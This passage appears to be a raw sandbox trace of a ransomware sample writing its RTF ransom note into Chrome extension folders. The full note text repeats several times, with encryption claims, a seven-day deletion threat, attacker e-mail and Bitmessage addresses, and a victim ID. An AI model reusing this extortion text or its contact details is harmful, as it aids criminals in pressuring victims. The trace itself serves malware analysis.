AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.606] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.607] CloseHandle (hObject=0x294) returned 1 [0297.607] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\#readme_eman#.rtf")) returned 0xffffffff [0297.607] GetLastError () returned 0x2 [0297.607] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pl\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.607] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.608] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.608] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable 